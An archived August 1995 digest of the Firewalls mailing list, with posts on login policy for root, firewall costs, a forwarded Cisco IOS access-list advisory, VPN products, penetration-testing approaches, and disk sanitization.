(smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA15502 for ; Fri, 4 Aug 1995 04:26:32 -0700 Message-Id: <199508041126.EAA15502@miles.greatcircle.com> Received: from cheops.anu.edu.au(150.203.76.24) by miles via smap (V1.3) id sma015489; Fri Aug 4 04:25:26 1995 Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA078715387; Fri, 4 Aug 1995 21:23:07 +1000 From: Darren Reed Subject: Re: preventing password accidents. To: rick@TIS.COM (Rick Murphy) Date: Fri, 4 Aug 1995 21:23:07 +1000 (EST) Cc: Firewalls@GreatCircle.COM (Firewalls Mailing List) In-Reply-To: <9508040133.AA02434@tis.com> from "Rick Murphy" at Aug 3, 95 09:33:53 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 1913 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In some mail from Rick Murphy, sie said: > > >What I'd like to propose is that firewalls and other systems which > >require the use of reuseable passwords take preventative measures, > >to stop a potentially harmful/critical password being entered across > >an insecure medium. ie if it sees the username "root" given to the > >"login:" prompt, it drops the connection immeadiately with no > >"Password:" prompt sent back. > > The problem with this approach is that you've given a potential cracker > some information - cracking root isn't helpful. You've actually made their > job easier. > > What you want to do with any net access attempt to "root" is to set off loud > alarms - and ignore the access - but avoid looking to the person trying the > account like you know what they're doing. Let them waste their time while > you try to track them back to the source. Anyone who tries to login as "root" to Unix knows what it is unless they are the victim of a con. I'd almost put that in the "too stupid to worry about" basket; almost but not quite. And if they're not successful, then the source site is not going to give anything away: all crackers worth anything know that certain things are bound to ring alarms. I don't care about giving away which accounts are and aren't useful, the aim is to stop reuseable passwords, which could have an impact on the system's integrity if disccovered, from being entered "accidently". Best way to accomplish this is to not make entering the password an available option, IMHO. s/key solves the problem of when you need to enter a password and you know that it may be captured, which is not the same. The accepting all usernames/password pairs the same (except that s/key will show up as different in some cases) would appear to me as a classic case of security through obscurity - and everyone but a 3-letter org. knows how bad that is, right ? :) darren From firewalls-owner Fri Aug 4 05:40:25 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA17066 for firewalls-outgoing; Fri, 4 Aug 1995 05:27:46 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA17030 for ; Fri, 4 Aug 1995 05:27:41 -0700 Received: from neptune.tis.com(192.94.214.96) by miles via smap (V1.3) id sma017023; Fri Aug 4 05:26:58 1995 Received: from relay.tis.com by neptune.TIS.COM id aa11186; 4 Aug 95 8:24 EDT Received: from sol.tis.com(192.33.112.100) by relay.tis.com via smap (g3.0.1) id xma015187; Fri, 4 Aug 95 08:16:01 -0400 Received: by tis.com (4.1/SUN-5.64) id AA13883; Fri, 4 Aug 95 08:23:04 EDT Date: Fri, 4 Aug 95 08:23:04 EDT From: Frederick M Avolio Message-Id: <9508041223.AA13883@tis.com> To: firewalls@greatcircle.com Subject: Job Openings in TIS Firewalls Group (BRIEF) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ftp://ftp.tis.com/users/avolio/fwjobs.html Respond as indicated, not to the list. [Brent okayed this posting. :-)] f From firewalls-owner Fri Aug 4 06:00:59 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA17423 for firewalls-outgoing; Fri, 4 Aug 1995 05:39:53 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA17370 for ; Fri, 4 Aug 1995 05:39:44 -0700 Received: from igate1.nasd.com(204.71.174.1) by miles via smap (V1.3) id sma017359; Fri Aug 4 05:38:50 1995 Received: by igate1.rkv.nasd.com; id IAA13970; Fri, 4 Aug 1995 08:32:14 -0400 Received: from rksqpd00-e3.rkv.nasd.com(150.123.95.171) by igate1.nasd.com via smap (g3.0) id xma013966; Fri, 4 Aug 95 08:31:53 -0400 Received: from gwsmtp1.rkv.nasd.com by rksqpd00.rkv.nasd.com (8.6.10/1.35) id IAA09533; Fri, 4 Aug 1995 08:35:41 -0400 Received: by gwsmtp1.rkv.nasd.com with Microsoft Mail id <30224086@gwsmtp1.rkv.nasd.com>; Fri, 04 Aug 95 08:45:10 PDT From: "Maiwald, Eric" To: Firewalls List Subject: RE: Cost of implementing a firewall Date: Fri, 04 Aug 95 08:43:00 PDT Message-ID: <30224086@gwsmtp1.rkv.nasd.com> Encoding: 67 TEXT X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Hello: >For those of you who have implemented a commercial firewall package I would >appreciate if you could share your experiences as to how much resources does >it >take to administer it, hardware costs, and looking back what do you think you >think you ended up paying (including hidden costs and manpower.)? According >to the vendors it takes very little to administer it but I would really like >to >get your viewpoint - especially when I am talking about thousands of users. >Regards >Vivek Vivek, In a previous life I had the job of setting up and administering several commercial firewalls. They were all from the same vendor. In general, the hardware and software costs are not hidden. They are well defined and they vary. To give you an idea using two commercial products - TIS sells their Gauntlet system with the platform for about $15k. At the other end, ANS will lease their system with a platform for something over $20k per month (they also sell it but the numbers on that escape me). The choice of the initial cost and vendor have a lot to do with how you will use the system. Administering the system will also depend on how you will use it. If you are planning to set it up and let it run with no outgoing user authentication, it is not very time consuming once you are up to speed. If every internal user requires an ID/PW then you have to figure out how many changes (adds, deletes, modifies) you will have per week. Depending on the system, you may have to add/delete accounts, help users with forgotten passwords, and add mail entries for incoming/outgoing mail. In short, it becomes a system admin job for some number of users. Another part of the costs deals with the review of the audit logs. I considered this part of my job to rather important and I examined the logs each morning. Depending on the traffic of the previous day, it could take me five minutes or two hours. I hope this is helpful for you. Eric ------------------------------------------------------------------ Eric Maiwald maiwalde@nasd.com Senior Information Security Specialist National Association of Securities Dealers All opinions are my own and do not necessarily represent the views of my employer. ------------------------------------------------------------------ From firewalls-owner Fri Aug 4 06:19:09 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA17422 for firewalls-outgoing; Fri, 4 Aug 1995 05:39:52 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA17371 for ; Fri, 4 Aug 1995 05:39:43 -0700 Received: from hawksbill.sprintmrn.com(199.11.1.3) by miles via smap (V1.3) id sma017338; Fri Aug 4 05:38:36 1995 Received: by hawksbill.sprintmrn.com (5.65/1.34) id AA09596; Fri, 4 Aug 95 08:37:40 -0500 From: paul@hawksbill.sprintmrn.com (Paul Ferguson) Message-Id: <9508041337.AA09596@hawksbill.sprintmrn.com> Subject: (fwd) Cisco Security Advisory (July 31, 1995) To: firewalls@greatcircle.com (Firewalls List) Date: Fri, 4 Aug 1995 08:37:40 -0500 (EST) Priority: U X-Mailer: ELM [version 2.4 PL22] Content-Type: text Content-Length: 6112 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Since I hadn't already seen this post come across this group. FYI. - paul Cisco Security Advisory (July 31, 1995) CIO Topic: SECURITY ADVISORY PLEASE READ for Important Internetwork News Posted : Aug 3 16:48:28 1995 Cisco Security Advisory ----------------------- Mon Jul 31 16:24:28 1995 The following describes an error in Cisco's IOS software 10.3 release when the 'tacacs-ds' or 'tacacs' keyword is used in extended IP access control lists. This bug can cause an extended IP access control list to be misparsed, possibly allowing unauthorized packets to circumvent a filtering router. This vulnerability is present in the following IOS software versions: 10.3(3.4) through 10.3(4.2) If you are running any of these IOS versions on a product that uses IP extended access lists, and you are using the 'tacacs-ds' or 'tacacs' keyword in these lists, then Cisco strongly recommends that you review your access lists to insure that they have been parsed correctly. You can determine what version of IOS you are running by issuing the following command: show version If your access list has been parsed incorrectly, the recommended action is to upgrade to a more recent version of IOS or perform the workaround described below. The bug is fixed by in the following official software releases: 10.3(4.3) or later (For reference, the Cisco update identifier for this fix is "CSCdi36962".) Customers may obtain software upgrades without going through the Cisco's Technical Assistance Center via Cisco's Customer Information On-Line service, instructions for downloading are available at the end of this message. You may also contact your Cisco distributor or contact Cisco's Technical Assistance Center (TAC) for more information. TAC can be reached by phone at 800-553-2447, by E-Mail to tac@cisco.com or via the World-Wide-Web at http://www.cisco.com. In Europe you can contact TAC by phone at 32-2-778-42-42 or via E-Mail to euro-tac@cisco.com. =========================================================================== A) Description A bug in certain versions of IOS can cause extended IP access lists to be parsed incorrectly. Under some circumstances, this may allow packets to bypass IP packet filtering. This may permit unintended IP traffic to pass through a filtering router. IP extended access lists between versions 10.3(1) through 10.3(3.3) used the keyword 'tacacs-ds'. This keyword could be saved as part of the router configuration either in non-volatile memory on the router or on an external TFTP server. Configuration files written by these versions which are read by versions 10.3(3.4) through 10.3(4.2) will not have the 'tacacs-ds' keyword parsed correctly. The result will be that the entire line in the access list will be ignored. An error message will be generated when this occurs. Loss of such a line from the access list may create a vulnerability if the access list is used as part of a packet filter. To determine if you are vulnerable, examine your current configuration and compare it to your intended configuration. If the access lists in your current configuration and your intended configuration do not use the keyword 'tacacs-ds', you are not vulnerable. You do not need to do anything. If your current configuration contains the keyword 'tacacs-ds', you should NOT upgrade that router to any version of IOS between 10.3(3.4) and 10.3(4.2). You are not currently vulnerable. If your intended configuration contains the keywords 'tacacs-ds', 'tacacs', or filters on TCP or UDP port 49, and your current configuration does NOT contain this line of the access list, you are currently vulnerable. You should perform the workaround described below. B) Workaround The following actions will remove the vulnerability: - Delete the access list and re-enter it based upon your intended configuration. Do not enter the 'tacacs-ds' keyword. Use the keyword 'tacacs' instead. C) Solution Obtain and install the appropriate release of IOS software as described above. For assistance contact Cisco's TAC. =========================================================================== Software upgrades may be obtained via any of the following mechanisms: A) World Wide Web (WWW): For registered CIO users please open a URL to: http://cio.cisco.com/kobayashi/Library_root.shtml and select the the version of software to download. For non-registered users open a URL to: http://cio.cisco.com/public/library/spc_req.shtml When prompted for a code, please enter: certjuly31 for a list of available files to download. B) FTP: ftp cio.cisco.com and at the initial (username) prompt, enter: certjuly31 At the password prompt, enter your e-mail address. Then: get README.certjuly31 This file contains a list of files available that close this vulnerability. Please examine this list to determine which files you need and then download them. C) Character-based "CIO Classic": For access, the following connection options are offered: o telnet cio.cisco.com o Dial-up modem + In Europe +33 1 64 46 40 82 + In the US (408) 526 8070 + vt100, N81, up to 14.4Kbps Enter either as a guest or registered user and navigate to the topic: Software Updates Special Files At the prompt for a code, please enter: certjuly31 A list of files will be displayed for you to select and download. - -- _______________________________________________________________________________ Paul Ferguson US Sprint tel: 703.689.6828 Managed Network Engineering internet: paul@hawk.sprintmrn.com Reston, Virginia USA http://www.sprintmrn.com From firewalls-owner Fri Aug 4 07:00:45 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA20182 for firewalls-outgoing; Fri, 4 Aug 1995 06:55:15 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA20131 for ; Fri, 4 Aug 1995 06:55:08 -0700 Received: from northshore.ecosoft.com(192.233.85.129) by miles via smap (V1.3) id sma020119; Fri Aug 4 06:54:44 1995 Received: by northshore.ecosoft.com id AA27327 (5.67a/IDA-1.5 for firewalls@greatcircle.com); Fri, 4 Aug 1995 09:53:29 -0400 Date: Fri, 4 Aug 1995 09:53:29 -0400 (EDT) From: mht X-Sender: mht@northshore To: Frederick M Avolio Cc: firewalls@greatcircle.com Subject: Re: Job Openings in TIS Firewalls Group (BRIEF) In-Reply-To: <9508041223.AA13883@tis.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Frederick, Are you sure this is the correct URL:???? On Fri, 4 Aug 1995, Frederick M Avolio wrote: > ftp://ftp.tis.com/users/avolio/fwjobs.html > > Respond as indicated, not to the list. [Brent okayed this posting. :-)] > > f > Colvard's Logical Premises: All probabilities are 50%. Either a thing will happen or it won't. Colvard's Unconscionable Commentary: This is especially true when dealing with someone you're attracted to. Grelb's Commentary Likelihoods, however, are 90% against you. From firewalls-owner Fri Aug 4 07:32:21 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA20994 for firewalls-outgoing; Fri, 4 Aug 1995 07:22:12 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA20964 for ; Fri, 4 Aug 1995 07:22:07 -0700 Received: from nsco.network.com(129.191.1.1) by miles via smap (V1.3) id sma020956; Fri Aug 4 07:22:03 1995 Received: from mnbp.network.com (ushub.network.com) by nsco.network.com (4.1/1.34) id AA24085; Fri, 4 Aug 95 09:40:01 CDT Received: by mnbp.network.com with Microsoft Mail id <30222C93@mnbp.network.com>; Fri, 04 Aug 95 09:20:03 CDT From: Greg Brennan To: firewalls mailing list Subject: FW: Virtual Private Network Enabling Technologies Date: Fri, 04 Aug 95 09:18:00 CDT Message-Id: <30222C93@mnbp.network.com> Encoding: 62 TEXT X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Subject: Virtual Private Network Enabling Technologies >Date: August 3, 1995 02:20PM >A couple of weeks ago we had a discussion about virtual private networks >running on top of the Internet. Does anyone have a list or web site with the >enabling technologies to implement VPNs? I'll take any references including >white papers and commercial recommendations. > >Steve >-- >Steve Lodin (317)451-0479 >Delco Electronics Corporation http://www.cs.purdue.edu/people/swlodin >Information & Systems Protection Purdue University COAST Project >swlodin@delcoelect.com swlodin@cs.purdue.edu "The Security Router" from Network Systems Corp. allows the construction of VPNs over the internet. The Security Router uses NSC's Data Privacy Facility (DPF) which incorporates the following cryptographic features: - Authentication and key exchange (ala RSA and Diffie-Hellman, 512 and 1024 bit keys) - Digital Signatures (using Message Digest 5) - Replay prevention - Data Compression, - and of course...Encryption (DES, Triple DES, IDEA, and Network Systems Cyper 1 (NSC1) algorithm which has high performance characteristics (>7Mb/s) and may be exported). Since VPNs may connect a single site to multiple different sites that each have their own security requirements (encryption algorithms, authentication etc.) it is critical to have the abilitity to sort the data leaving each site into various classes in order to determine which cryptographic parameters to apply. Packet filters in routers can be extremely useful here. Network Systems' has a very high performance filtering capability known as "NetSentry". It can filter traffic based on host, subnet, source/destination address, protocol, or application (at all 7 layers of the ISO model), or even time of day/day of week. When NetSentry is combined with Data Privacy Facility (DPF), administrators are provided with a lot of flexibility and capability (security wise) when designing the VPN. Information on the hardware and software (DPF, NetSentry) may be obtained at Network Systems' web site at http://www.network.com Thanks for asking. Greg Brennan ________________________________ Greg Brennan | Network Systems Corp. (Canadian Office) Manager, Business Partner Solutions | 5710 Timberlea Blvd., Suite 207 Internet: greg.brennan@network.com | Mississauga, Ontario L4W 4W1 Voice: (905) 629-0440 | "Secure Networks-On-Demand"TM Fax: (905) 629-0435 | http://www.network.com From firewalls-owner Fri Aug 4 08:10:11 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA21092 for firewalls-outgoing; Fri, 4 Aug 1995 07:25:10 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA21077 for ; Fri, 4 Aug 1995 07:25:07 -0700 Received: from netcom16.netcom.com(192.100.81.129) by miles via smap (V1.3) id sma021072; Fri Aug 4 07:25:03 1995 Received: from mlhst.wavetech.com by netcom16.netcom.com (8.6.12/Netcom) id HAA01367; Fri, 4 Aug 1995 07:21:58 -0700 Received: from cc:Mail SMTPLINK 2.1 by mlhst.wavetech.com id AA807553482; Fri, 04 Aug 95 08:56:00 CST Date: Fri, 04 Aug 95 08:56:00 CST From: "Paul Osterwald" Message-Id: <9507048075.AA807553482@mlhst.wavetech.com> To: Firewalls@GreatCircle.COM, kaplan@bpa.arizona.edu (Ray Kaplan) Cc: padgett@tccslr.dnet.mmc.com Subject: Re[2]: Sidewinder Challenge Sender: firewalls-owner@GreatCircle.COM Precedence: bulk To all: As a former SEAL, I can tell you that the concept of PROPER planning, is extremely important. The approach which you are discussing is the not only the BEST approach, but the ONLY approach, a professional would consider. When we would pull exercises to target and penetrate Naval installations this was not done with a "gee, lets go mess with the kids this afternoon" attitude. The most important phase of any penetration operation is the planning stage. Hopefully, we will see more meaningful discussion on this topic. Respectfully, Paul "There may be a hundred combat postures, but there is only one purpose: to win" Heiho Kaden Sho ______________________________ Reply Separator _________________________________ Subject: Re: Sidewinder Challenge Author: kaplan@bpa.arizona.edu (Ray Kaplan) at Internet Date: 8/3/95 4:13 PM Padgett writes: >mjr rites: >> Rather than see "take a blindfolded shot at the system" >>firewalls tests, I'd rather see: "here is a detail of our design, >>take it and study the exact configuration you will be attacking >>and come back in a week with testing tools" approach. Anything >>else is security through obscurity, and hopefully we've learned >>that that's not very good. >I agree with Marcus with the additional comment: periodically I get requests >from people to "try to break into system xxxx and see if it is secure". >I always refuse (maybe why haven't not been promoted in ten years), not >because there are any doubts that it can be done, but because Things May >Get Broken in the process. This parallels my experience and I agree. So, how do we move the status quo to our shared point of view? It seems that if we take some of these things one, small step at a time, we can build a significant collection of war stories to support our possition that everyone can use. ... Or, do we have to wait until one of us has the time / resources to do a book on the subject? Anyone know of good stories about attack efforts that went arwy? I have a few that I'll share as I have time. >The right way is to first studdy the system in question off line: the >network configuration, the ACLs, the design rules. Once a good understanding >of the concept is made, then study the policies involved (what ? you don't >have any ? Then what am I testing ? - always have a sample set when you say >this BTW). > >Next examine the perimeter for "leaks" - conduct a modem sweep. Call the >phone company and ask about leased lines. Sweep the network for unknown >nodes (have *never* seen a paper list that was up-to-date - have even found >entire unlisted subnets). > >At this point you should not have to do any penetration testing, you should >be able to predict all vulnerabilities. Of course you are going to need >to demonstrate them since no-one will believe you but there should not be >any element of doubt, you should know. Agreed. Now, you can see why I think we need an "Attack-a-thon" where people can see these first-order principals demonstrated *before* they bankrupt people like meand Marcus by jerking our chains for "system break-in quote RFP responses" and make people like you (who are credentialed in a formal manner) wonder why you aren't as successful as those who go do attacks? Seems that such "please come attack my system to prove that it is secure" only comes up with one, stupid and obvious problem to report which the client's management poo poos as noise. One attempt to change this status quo is reportedly being made at the DEFCON hacker conference this weekend in Vegas. Several interesting sessions seem to be focusing on explaining to "new" hackers that they need to clean up their acts and focus on more professional approaches. The reason that I bring this up, is that it seems that maybe one of my recurrent fantacies may be a reality soon. I have always wanted to do an attack on a commercial organization where-in I'd materially affect their business (maybe even improve it ;) ) and then use this possition to change the lay of the land. For instance, wouldn;t it be great if you walked into a board room and told thte CEO to get out of your chair since you now owned the place? Although I agree with your earlier point about: >Things May >Get Broken in the process. Im my own experience, a stock exchange once called for an attack on their firewall. I took them seriously and went to do my homework. I assembled critical mass (people, knowledge, and tools) to affect an attack goal: actually trade and move some money around. I'm pretty convinced that a dedicated attack that is properly designed, well funded, and well executed *WILL* succeed. As an example, during the L.A. riots, a friend commented that a well disiplined team of specialized criminals could have cleaned up amid the pandamonium by picking out selected jewlery stores and bank branches for professional heists. If nothing else, it seems that the frailty of most systems guarentees the success of a dedicated attack. The prospective client was horrified that I actually proposed to slip in and out during the heat of the middle of the trading day. Their idea was that I'd come on a Sunday and piddle with things when they were slow and they were affraid that they'd all loose their jobs *if* I succeeded. They weren't so much worried about my mucking up their production systems, but were more worried about this than seemed justified given that I proposed a surgical strike. >However, while the Sidewinder challenge is somewhat flawed technically, it >is good marketing particularly when the target is people with money who know >little/nothing about firewalls. You could have the best product in the world >but it will fail in the marketplace without effective marketing and I would >rather see the sales go to a product with potential like Sidewinder from an >in-depth company than to a one-trick-pony with a glossy GUI as happened in >the anti-virus market. No question there! One question that remains is how to keep this playing field level. >But then what would I know, am not particularly sucessful. Well, that depends on how you measure success. I - for one - have benifited greatly from your experience. (More kudos when I can take the time to say them right.) Meantime, how to collect and distill some of this for practical use in helping solve firewall (and general infrastructure security) problems for us all? I keep coming back to the idea that we need a hack-a-thon that is properly designed, executed, and reported. Or, am I just going to end up looking at another dusty journal of experience on a library shelf? While there is a good argument to be made for me to just go do this, I wonder if anyone would even take note. 'course, it may be that all we need is a good marketing / PR type to make this pretty enough to catch people's fancy and make it a dooable do? RayK 8) - Better Living Through Authentication - I usually only speak for myself Ray Kaplan - Security Services - P.O. Box 23210 - Richfield, MN 55423 Phone / FAX (612) 861-7198 - currently: kaplan@bpa.arizona.edu But, as with everything else in life, this will change. From firewalls-owner Fri Aug 4 08:40:24 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA23476 for firewalls-outgoing; Fri, 4 Aug 1995 08:11:03 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA23421 for ; Fri, 4 Aug 1995 08:10:55 -0700 Received: from neptune.tis.com(192.94.214.96) by miles via smap (V1.3) id sma023408; Fri Aug 4 08:10:40 1995 Received: from relay.tis.com by neptune.TIS.COM id aa00934; 4 Aug 95 11:00 EDT Received: from sol.tis.com(192.33.112.100) by relay.tis.com via smap (g3.0.1) id xma018265; Fri, 4 Aug 95 10:52:11 -0400 Received: from sol.tis.com by tis.com (4.1/SUN-5.64) id AA26980; Fri, 4 Aug 95 10:59:15 EDT Message-Id: <9508041459.AA26980@tis.com> From: Frederick M Avolio X-Organization: Trusted Information Systems, Inc. X-Phone: +1 301 854 6889, +1 410 442 1673, FAX: +1 301 854 5363 To: firewalls mailing list Subject: Re: FW: Virtual Private Network Enabling Technologies Date: Fri, 04 Aug 95 10:59:14 -0400 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Not wanting to send product promotions to this list, I only replied to the original poster. But since I see other traffic on this... As one source of information, let me point people to TIS's home page (www.tis.com) and the firewalls papers contained therein. There are descriptions of what I called virtual network perimeter (what is being referred to now as a Virtual Private Network). Any firewall product, such as the Gauntlet Firewall, that supports firewall to firewall encryption can be used to set up a VPN. The requirement (and this is mentioned in one of my papers I think) should be obvious but often is not: if you are going to extend your network security perimeter to include other networks, they'd better share the same security policy, security posture, and administrative domain (management chain for example, not domain in the DNS sense). Fred From firewalls-owner Fri Aug 4 09:01:03 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA25105 for firewalls-outgoing; Fri, 4 Aug 1995 08:59:13 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA25061 for ; Fri, 4 Aug 1995 08:59:05 -0700 Received: from unknown(132.9.205.2) by miles via smap (V1.3) id sma025008; Fri Aug 4 08:58:47 1995 Received: from cs28-1.ellsworth.af.mil by ns.ellsworth.af.mil with SMTP (5.59/25-eef) id AA01680; Fri, 4 Aug 95 09:56:15 MDT Received: by cs28-1.ellsworth.af.mil with Microsoft Mail id <30224FD5@cs28-1.ellsworth.af.mil>; Fri, 04 Aug 95 09:50:29 PDT From: "Tucker, R., SrA, 28CS/SCSNS" To: "'firewalls-owner'" Subject: RE: Sanitizing SCSI disks Date: Fri, 04 Aug 95 09:51:00 PDT Message-Id: <30224FD5@cs28-1.ellsworth.af.mil> Encoding: 48 TEXT X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Use Norton Wipedisk. Overwrite three times... that'll clear the media enough so that it can be deamed "unclassified." However, it *STILL* must remain in the DOD inventory for two years being *USED* in an unclassified mode before it can be released to the public. (The destruction certificate must also remain with the computer for two years.) This is approved up to and including TS. If you're a civilian, (and don't have to follow those requirements) just overwrite with Wipedisk three times. If what's on there makes you *THAT* paranoid, use Wipedisk 99 times. :*) ---------- From: firewalls-owner To: Firewalls Subject: Re: Sanitizing SCSI disks Date: Sunday, July 30, 1995 8:26AM > I see many posts about destroying disks since there is no > secure way to remove the classified data. If anyone is > interested, my company has written a SCSI disk overwrite > program which has been approved for use on data up to secret by > the Navy, Air Force, DIS and DISA. The product is called > UniShred Pro and works on Sun, HP, IBM and SGI workstations. Is that approved under the ISM or the NISPOM? The NISPOM takes effect July 31st. NISPOM requirements are much more restrictive regarding disk sanitization. Someone finally woke up and said, hey, if you can't overwrite revectored bad blocks you can't sanitize the media, you have to destroy it. ---------------------------------------------------------------------------- --- - "Crisis over, back to panic mode!" ---------------------------------------------------------------------------- --- - N.A. Bogart nabadm@odo.acdnj.itt.com OpenVMS & Security Systems Manager bogart@itt.com ITT Avionics (201) 284-5117 VOICE(MAIL) 100 Kingsland Road (201) 284-3947 FAX Clifton NJ 07014 (201) 730-2681 PAGER ---------------------------------------------------------------------------- --- - From firewalls-owner Fri Aug 4 10:20:47 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA27539 for firewalls-outgoing; Fri, 4 Aug 1995 09:38:02 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA27511 for ; Fri, 4 Aug 1995 09:37:56 -0700 Received: from uvs1.orl.mmc.com(141.240.192.10) by miles via smap (V1.3) id sma027466; Fri Aug 4 09:37:29 1995 Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA26231; Fri, 4 Aug 95 12:28:41 -0400 Date: Fri, 4 Aug 95 12:28:40 -0400 Message-Id: <9508041628.AA26231@uvs1.orl.mmc.com> From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com Subject: Not a bug, a feature Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Are you sure this is the correct URL:???? (ref the TIS advert which I will not repeat) No, it is a test - if you can't download/read it, don't bother applying (not as strange as mjr's funny FTP ports though). While there, note Fred's .GIFs. Warmly, Padgett From firewalls-owner Fri Aug 4 10:30:20 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA25699 for firewalls-outgoing; Fri, 4 Aug 1995 09:08:24 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA25644 for ; Fri, 4 Aug 1995 09:08:16 -0700 Received: from kant.newsedge.com(192.206.82.2) by miles via smap (V1.3) id sma025628; Fri Aug 4 09:07:47 1995 Received: from herne.newsedge.com by newsedge.com (4.1/SMI-4.1) id AA26489; Fri, 4 Aug 95 12:02:30 EDT Date: Fri, 4 Aug 95 12:09:23 EST Message-Id: <9508041209.AA13212@herne.newsedge.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii From: "Chris Brenton" Reply-To: X-Sender: To: firewalls@GreatCircle.COM Subject: Linux X-Mailer: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Any comments on using Linux as a firewall system? I'm thinking in terms as both a network filter and as a dial up solution. If anyone with experience in doing this (either successfully or not) could give some pointers it would be greatly appreciated. From firewalls-owner Fri Aug 4 11:01:20 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA26335 for firewalls-outgoing; Fri, 4 Aug 1995 09:20:35 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA26312 for ; Fri, 4 Aug 1995 09:20:32 -0700 Received: from unknown(146.155.224.4) by miles via smap (V1.3) id sma026305; Fri Aug 4 09:20:28 1995 Received: from pc_40 by rubik with smtp (Linux Smail3.1.28.1 #3) id m0sePSD-0006miC; Fri, 4 Aug 95 12:18 CST Message-Id: Date: Fri, 4 Aug 95 12:18 CST X-Sender: quito@rubik.constructa.cl Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Firewalls@GreatCircle.COM From: quito@constructa.cl (Francisco Javier cabezas) Subject: about ipfwadm in Linux X-Mailer: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I need to know something about IPFWADM.... What are "the blocking rules", "the forwarding rules" and "the IP accountting rules " ??? What's the mean ? Thanks for all. Quito. +-------------------------------+ | Francisco Javier Cabezas V. | | Desarrollo y Soporte Unix | | quito@constructa.cl | +-------------------------------+ From firewalls-owner Fri Aug 4 11:06:20 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA26736 for firewalls-outgoing; Fri, 4 Aug 1995 09:25:48 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA26690 for ; Fri, 4 Aug 1995 09:25:40 -0700 Received: from gatekeep.marconi.ca(198.168.197.34) by miles via smap (V1.3) id sma026644; Fri Aug 4 09:25:15 1995 Received: from av410a.mtl.marconi.ca by gatekeep.marconi.ca; (5.65/1.1.8.2/21Sep94-0917AM) id AA07687; Fri, 4 Aug 1995 12:24:01 -0400 Received: from av410a.mtl.marconi.ca by av410a.mtl.marconi.ca (PMDF V4.3-13 #3809) id <01HTOB1O5VU88Y5GXM@av410a.mtl.marconi.ca>; Fri, 04 Aug 1995 12:23:54 -0400 (EDT) Date: Fri, 04 Aug 1995 12:23:54 -0400 (EDT) From: Harold March Subject: MorningStar SecureConnect To: Firewalls@greatcircle.com Message-Id: <01HTOB1O6YF68Y5GXM@av410a.mtl.marconi.ca> Organization: Canadian Marconi Company X-Vms-To: IN%"Firewalls@greatcircle.com" X-Vms-Cc: MARCH Mime-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Content-Transfer-Encoding: 7BIT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk One of our remote sites wishes to obtain their own Internet connect and wants to use a MorningStar SecureConnect "firewall". As far as I can tell this is just a filtering router which does not give me the "warm & fuzzies" since this can probably be compromised more easily than the DEC SEAL firewall we have set up. Am I wrong to think that this is going to backdoor our net or should I think about firewalling off their site? Any MorningStar users out their who prefer their solution rather than the DMZ/Bastion host approach? Harold March CMC DECnet: AV410A::MARCH Canadian Marconi Company Internet: march@mtl.marconi.ca MIS/IT CompuServe: 76424,3451 TEL: 514-748-3000 ext 4467 FAX: 514-748-3136 From firewalls-owner Fri Aug 4 11:31:32 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA00501 for firewalls-outgoing; Fri, 4 Aug 1995 